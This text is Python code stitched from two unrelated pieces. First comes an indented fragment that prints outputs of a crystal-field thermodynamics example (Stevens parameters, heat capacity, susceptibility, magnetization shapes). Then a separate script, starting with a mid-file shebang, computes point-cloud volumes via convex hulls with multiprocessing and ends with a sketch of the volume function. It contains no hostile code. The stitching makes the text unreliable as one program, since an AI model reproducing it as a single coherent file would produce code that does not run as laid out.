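    stevens, cV, susc, mag = td_example.output_all_data(W_sign=1,
                                                        cV_T_range=[1, 300, 10],
                                                        susc_T_range=[1, 300, 10],
                                                        mag_T_range=[1, 300, 2],
                                                        mag_B_range=[0.5, 10, 5])
    print('Stevens parameters of first set:', stevens[0])
    print('cV curve shape:', np.shape(cV[0]))           # (10, 2): columns are (T, cV/kB)
    print('susceptibility shape:', np.shape(susc[0]))   # (10, 1 + number of field directions)
    print('magnetization shape:', np.shape(mag[0]))     # (5, 2, 2 + number of field directions)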
#!/home/amit/Software/miniconda3/envs/default/bin/python

import scipy.spatial as sp
import csv
import numpy as np
import argparse
import multiprocessing as mp

from pointcloudvolume import calculateVolume

"""
# The function that calculates volume
def writevolume(input):
    infile, outdir = input
    outfilename = outdir + '/volume.dat'
    with open(infile, 'r', newline='') as inp, open(outfilename, 'w') as outfile:
        outfile.write('volume\n')
        inp.readline()
        reader = csv.reader(inp, delimiter=',', quoting=csv.QUOTE_NONNUMERIC)
        for row in reader:
            # Read the position and rotation vectors
            xr = np.array(row).reshape((-1, 3))
            # Get only the position vectors
            xi = xr[:int(xr.shape[0]/2), :]
            # Project the position vectors to a sphere
            x = xi/np.linalg.norm(xi, axis=1)[:, np.newaxis]
            # Make the mesh
            mesh = sp.ConvexHull(x).simplices
            # Calculate volume of each tetrahedron
            a = xi[mesh[:, 0]]
            b = xi[mesh[:, 1]]
            c = xi[mesh[:, 2]]
            vol = 0.1666667*np.sum(np.abs(np.einsum('ij,ij->i', np.cross(a, b, axis=1), c)))
            line = '{0:7.5f}\n'.format(vol)
            outfile.write(line)
"""


# The function that calculates volume
def writevolume(input):
    infile, outdir = input
    outfilename = outdir + '/volume.dat'
    with open(infile, 'r', newline='') as inp, open(outfilename, 'w') as outfile:
        outfile.write('volume\n')
        inp.readline()
        reader = csv.reader(inp, delimiter=',', quoting=csv.QUOTE_NONNUMERIC)
        for row in reader:
            vol = calculateVolume(row)
            line = '{0:7.5f}\n'.format(vol)
            outfile.write(line)


if __name__ == "__main__":
    # Create a command-line argument parser
    parser = argparse.ArgumentParser(description='Input data file path.')
    parser.add_argument('-i', '-input', nargs='+', required=True,
                        help='a single or a list of input data files')
    parser.add_argument('-o', '-output', nargs='+', required=True,
                        help='output directories corresponding to the input files')

    # Parse the input files
    args = parser.parse_args()
    if len(args.i) != len(args.o):
        print('The number of output directories does not match the number of input files.')
        exit()

    p = mp.Pool(processes=8)
    p.map(writevolume, zip(args.i, args.o))
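
# Added sketch only: the real calculateVolume lives in the external pointcloudvolume
# module, which is not shown here. This reimplementation simply mirrors the
# commented-out reference code above (convex hull of the unit-sphere projection,
# then summing signed tetrahedron volumes), so treat it as an assumption rather than
# the module's actual definition.
def calculate_volume_sketch(row):
    xr = np.array(row).reshape((-1, 3))                   # positions followed by rotations
    xi = xr[:int(xr.shape[0] / 2), :]                     # keep only the position vectors
    x = xi / np.linalg.norm(xi, axis=1)[:, np.newaxis]    # project positions onto the unit sphere
    mesh = sp.ConvexHull(x).simplices                     # triangulate the surface via the convex hull
    a, b, c = xi[mesh[:, 0]], xi[mesh[:, 1]], xi[mesh[:, 2]]
    # each surface triangle plus the origin forms a tetrahedron; sum |det(a, b, c)| / 6
    return np.sum(np.abs(np.einsum('ij,ij->i', np.cross(a, b, axis=1), c))) / 6.0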